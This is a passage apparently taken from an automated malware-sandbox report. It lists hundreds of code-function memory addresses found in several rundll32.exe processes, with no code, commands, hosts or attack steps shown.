                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B70ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CA156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BF154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C41A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C9186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BE243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BC309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CC38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CB391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CD3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CA429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BB41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C04B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CE498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B44FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C64F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C74DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D04DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C3512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BF58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C45CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D3672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B8650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C2753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BB821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B2830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C1831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BE86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C6864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D0867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BC850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B88F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B68DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CD8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BF93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C0946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B1950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CC9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C99AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D1993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B6A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B9A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BCA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BAB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BBB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D1B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C4B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B7B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CEBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C2BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C7BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B6C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CCC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BEC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C0D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BBD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C8D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C3D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D0D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BFD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B8D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CBE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BAE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CEE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B6ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CFF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B2FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B3FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B1F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BCFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00815483
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082C089
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082B28C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082E294
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081E09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082D898
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081A29A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082049E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082069C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081F8B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082A0D3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082CCD7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008162D6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082F8DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00815CDE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008268DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008164ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008258F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00817CF4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008138FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008250F9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081A81A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00824A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00815E1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081AC21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00816029
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00829829
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082482E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00811C30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00820C31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00822A3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081BE43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00824440
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081D643
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081BC50
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00817A50
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082FC67
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00825C64
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081F66B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081DC6A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0083086E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00832A72
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00818E7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00816F82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00828586
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082B78F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081F18C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081E98F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00830D93
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082A791
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00818195
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081139B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008123A1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008235A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00828DAA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082BDA9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008133B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00826FCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082C7C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008239CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081C3CE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00821FF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082DFFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00818B00
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081B709
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081B10F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00822912
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081851A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00813B2E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00820133
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082F331
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081ED3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00823141
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081FD46
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081AF4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00810D4C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00810D50
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00821B53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00829556
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00823F56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081E554
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00830F54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0083015B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00819F66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00828171
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00816B7B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00745CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007370ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007474DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00751B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00743512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00739700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00738D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00753672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00739A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00746864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00750867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0075146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00738650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00745040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00732830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00741831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007464F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007388F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007344FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007504DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007368DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007404B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00748D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00744B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00731950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00742753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00750D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00740946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00743D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00740D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00742BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007445CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00747BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00733FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00732FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007441A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007499AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00751993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00731F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00737B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00749186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00609700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00615CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00615040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006070ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00606083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006141A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00619186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0062146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006164F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006044FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006204DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006174DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006104B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00613512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006145CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00623672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00608650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00612753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00620867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00616864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00611831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00602830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006088F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006068DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00610946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00601950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006199AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00621993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00609A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00606A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00621B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00614B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00612BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00617BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00607B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00606C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00618D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00613D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00620D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00610D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00608D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00606ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00602FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00603FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00601F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A04B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002ABE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AE498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AEE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002970ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A5CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A74DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00299700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A3512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B1B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AB391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00298D95
